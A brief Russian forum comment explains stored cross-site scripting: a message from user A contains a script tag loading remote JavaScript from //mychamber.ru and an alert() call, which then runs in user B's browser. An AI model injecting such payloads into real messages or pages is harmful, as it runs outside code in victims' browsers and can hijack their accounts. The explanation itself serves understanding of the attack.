Maxmaxmaximus5, объясняю, А отправляет письмо Б, письмо выглядит так
<script src='//mychamber.ru/build/ui.js'></script>
бла бла бла, я свиснул твой акк {alert('Неудачник')} сюрприз
В итоге получаем то что у пользователя Б выполниться вредонсый код от правленый пользователем А